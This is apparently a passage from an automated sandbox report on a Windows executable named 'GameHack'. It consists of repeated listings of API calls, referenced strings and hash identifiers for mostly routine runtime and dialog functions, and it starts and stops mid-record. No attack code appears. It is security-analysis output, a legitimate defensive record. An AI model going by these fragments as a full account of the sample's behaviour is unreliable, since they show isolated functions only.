                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: a8c4a8a9697f768811270c55ed33703e74e93077001e68f8013c7edd3c3383d3
                                      • Instruction ID: 6e80503aece68837b347fc63563e6195ae560a54a9d11f8a584bba0e13c6af22
                                      • Opcode Fuzzy Hash: a8c4a8a9697f768811270c55ed33703e74e93077001e68f8013c7edd3c3383d3
                                      • Instruction Fuzzy Hash: 2111E932244298BFD7219F99DC4DF6637AAEB46354F18102AF611BB1E0C7A1A901E723
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 95262ac65671c038a05b8e5707a8cfea335cfa44d8663fec6f70d07b0d1963d0
                                      • Instruction ID: 8d56311dacd278be949b0ec1c631ba1cb13900eb10bca23b98d0a94877e77d4c
                                      • Opcode Fuzzy Hash: 95262ac65671c038a05b8e5707a8cfea335cfa44d8663fec6f70d07b0d1963d0
                                      • Instruction Fuzzy Hash: 91216F3254424CAADF21DEA4CC46FEE7BECEF15300F041513FA15A62A1D371DA569B51
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEA9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00EEA9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00EEAA24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      • Opcode ID: e566055b4191e76a70730869afe279315e2e87c0cad21606eba4d907e028946a
                                      • Instruction ID: 957d7e7b7cd3f74b83bc94922601475ef44666d60ca4544eb79eb5184bf0bb26
                                      • Opcode Fuzzy Hash: e566055b4191e76a70730869afe279315e2e87c0cad21606eba4d907e028946a
                                      • Instruction Fuzzy Hash: 2A116B3294025C7ADB219E65AD09FFB777DEB49310F040039FA49F3181C261AD55E672
                                      APIs
                                      • _swprintf.LIBCMT ref: 00EDB51E
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • _wcschr.LIBVCRUNTIME ref: 00EDB53C
                                      • _wcschr.LIBVCRUNTIME ref: 00EDB54C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: d2d045e0c7b2b5bb72ecd79da5b96c75214cc5bb022bd869e1ba81b616d57419
                                      • Instruction ID: b3ffd3cc496df1614a5c5ed32c5fcf9aaea17c85ee8c3cd6bc18dae8478c90d8
                                      • Opcode Fuzzy Hash: d2d045e0c7b2b5bb72ecd79da5b96c75214cc5bb022bd869e1ba81b616d57419
                                      • Instruction Fuzzy Hash: 6D014953904311FAC720ABB5AC42C7BB7EDEE953A07816417F945E6281FB30D851C2A1
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE06F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE06FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00EE0725
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 27a0c6bb7d73e1880326fc04ef9a01199b069715c3ff0051dbe5769310d67de2
                                      • Instruction ID: 12ad1509fb253c2bdeb9313b87e1348672c1aaeb348ad034a428c06d7ab8b32a
                                      • Opcode Fuzzy Hash: 27a0c6bb7d73e1880326fc04ef9a01199b069715c3ff0051dbe5769310d67de2
                                      • Instruction Fuzzy Hash: 2011A0B1601709AFC3206F66C884AA7FBECFB94758F10482EF1DA92200D6B16A81DB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 2b894222f52f126952b433d4fb4b27ce44303aa73c6bdb00e0069b22e1198812
                                      • Instruction ID: 83f904aac9adf0fe58275291ee3c1036a23e7003789d90cfed8facede8cc6f04
                                      • Opcode Fuzzy Hash: 2b894222f52f126952b433d4fb4b27ce44303aa73c6bdb00e0069b22e1198812
                                      • Instruction Fuzzy Hash: 8901D4B160828EAFCB119F16EE44EDA7FA9E7143D4B018421F905E3271CB719C51FBA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction ID: 6d920b8bb74e89132e7e8d0ebb90f6566e30ca02882ca554b41aa62955869a75
                                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction Fuzzy Hash: 0FA1577190038E9FEB25CF68C8917BEBBE5EF65314F1451ADE6D5AB382C2388942C750
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00ED80B7,?,?,?), ref: 00EDA351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00ED80B7,?,?), ref: 00EDA395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00ED80B7,?,?,?,?,?,?,?,?), ref: 00EDA416
                                      • CloseHandle.KERNEL32(?,?,00000000,?,00ED80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00EDA41D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: 240ba4401f0ab2789ce52eb2647b12b42294a7f46cc7d72f5f2fc082736b7a97
                                      • Instruction ID: 0429b30067e52cab3d533f6a5e77bd001e36bad43da6efd46e8126ad6881e3ea
                                      • Opcode Fuzzy Hash: 240ba4401f0ab2789ce52eb2647b12b42294a7f46cc7d72f5f2fc082736b7a97
                                      • Instruction Fuzzy Hash: 1441D0312483859AD731DF24DC45BEEBBE9EB81704F08092EB5E0A3291D7A49B49DB53
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00EF89AD,?,00000000,?,00000001,?,?,00000001,00EF89AD,?), ref: 00EFC0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EFC16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EF67E2,?), ref: 00EFC181
                                      • __freea.LIBCMT ref: 00EFC18A
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 2abcc1213ae75236d162f40ba5a7c0c1d4e67a876e023609820b650964c8ddb2
                                      • Instruction ID: 0ec63818bd6fa139aa17dd491ddd077155cd2649a0b147277fee2d279662ecf1
                                      • Opcode Fuzzy Hash: 2abcc1213ae75236d162f40ba5a7c0c1d4e67a876e023609820b650964c8ddb2
                                      • Instruction Fuzzy Hash: 2531D072A0121EABDB248F65DD41DBE7BB9EB44314F244168FD04E7291EB35CD61CBA0
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00EE9DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EE9DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE9DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EE9DE9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: f134084670ec0f00d930bf388918a91ec9941d7cb8633d4c139a52e751aefd92
                                      • Instruction ID: c3b55e85d4c2c273e1563fa6ab5ebcec69a14c42c40f19a02c3e2ef5a5263e0c
                                      • Opcode Fuzzy Hash: f134084670ec0f00d930bf388918a91ec9941d7cb8633d4c139a52e751aefd92
                                      • Instruction Fuzzy Hash: 46E0C271989729A7D3A41BB0BD0CBCB3F56AB09773F050004F701A61D0DE704409EF90
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00EF2016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00EF201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00EF2020
                                        • Part of subcall function 00EF310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00EF311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00EF2035
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 8d1a1faff69b6c3706851c6f95c5e38c5e9fa195f5392e526b8350884e064c9d
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: 94C04C2610764CE41C113AB161031BD07C00C637C8B9270CAEB9037143DF060A0AA037
                                      APIs
                                        • Part of subcall function 00EE9DF1: GetDC.USER32(00000000), ref: 00EE9DF5
                                        • Part of subcall function 00EE9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EE9E00
                                        • Part of subcall function 00EE9DF1: ReleaseDC.USER32(00000000,00000000), ref: 00EE9E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00EE9F8D
                                        • Part of subcall function 00EEA1E5: GetDC.USER32(00000000), ref: 00EEA1EE
                                        • Part of subcall function 00EEA1E5: GetObjectW.GDI32(?,00000018,?), ref: 00EEA21D
                                        • Part of subcall function 00EEA1E5: ReleaseDC.USER32(00000000,?), ref: 00EEA2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: 1fd0ead85515e3dd5335baea4e5cdae492aab73e251fdad245fa05c53a467c22
                                      • Instruction ID: 1d676c6ef27fea29a17c3e0e1fd9b60192988d65cbe1a4ac92020e77a16c39aa
                                      • Opcode Fuzzy Hash: 1fd0ead85515e3dd5335baea4e5cdae492aab73e251fdad245fa05c53a467c22
                                      • Instruction Fuzzy Hash: 85810371208358AFC714DF69C84492ABBE9FF88714F04492DF98AE7260DB71AD05DB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: c321f4356fd67f76b2ee65de65f613345cdbe42b888a4f515c9609499f4bdae8
                                      • Instruction ID: efe969d6f2d9a5adc7e83c82a23fb7130066d8f83504203d6fc37aaa43afca8a
                                      • Opcode Fuzzy Hash: c321f4356fd67f76b2ee65de65f613345cdbe42b888a4f515c9609499f4bdae8
                                      • Instruction Fuzzy Hash: E751C83124C7CCF9EE211A96CD42FB676A6A704B00F247916F39A744F5C6F154D0B612
                                      APIs
                                      • _free.LIBCMT ref: 00EFAA84
                                        • Part of subcall function 00EF8849: IsProcessorFeaturePresent.KERNEL32(00000017,00EF8838,00000050,00F03958,?,00EDCFE0,00000004,00F10EE8,?,?,00EF8845,00000000,00000000,00000000,00000000,00000000), ref: 00EF884B
                                        • Part of subcall function 00EF8849: GetCurrentProcess.KERNEL32(C0000417,00F03958,00000050,00F10EE8), ref: 00EF886D
                                        • Part of subcall function 00EF8849: TerminateProcess.KERNEL32(00000000), ref: 00EF8874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction ID: 474b0d826a03eb782dac6408717ecd52d193960ef4496a1d9b5743a8e70df31e
                                      • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction Fuzzy Hash: 4251BFB1E0020EAFDB14DFA8C9419BDB7F5EF88314F299079E658BB300E6719A058B51
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED78CC
                                        • Part of subcall function 00EDA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA458
                                        • Part of subcall function 00EDA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: ac9facfb51343708864ec68432ad330c3377c3ac8ab84bc10aefd40f53dcec51
                                      • Instruction ID: 91c95e2d1a36293b314d14c75e2b3944abc22d1500635c26d26f754e2dc175c0
                                      • Opcode Fuzzy Hash: ac9facfb51343708864ec68432ad330c3377c3ac8ab84bc10aefd40f53dcec51
                                      • Instruction Fuzzy Hash: D2419471905268AADB24EB50DD45EEEB3BCEF44300F00509BB649B3292EB745F86DF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 0bb37662ed6b0cbe021faca22ed8c556d017f52f142c1ee3cf8ead608e8cb2a6
                                      • Instruction ID: 5e1b76b759454aa1ed945ee956b8a5c5832677c11fd212eaec8598eb5abec2fe
                                      • Opcode Fuzzy Hash: 0bb37662ed6b0cbe021faca22ed8c556d017f52f142c1ee3cf8ead608e8cb2a6
                                      • Instruction Fuzzy Hash: BC418C35800259EBCB20AF21DC41EEF77A9EF84794B126167F815B6352F770DA429A60
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
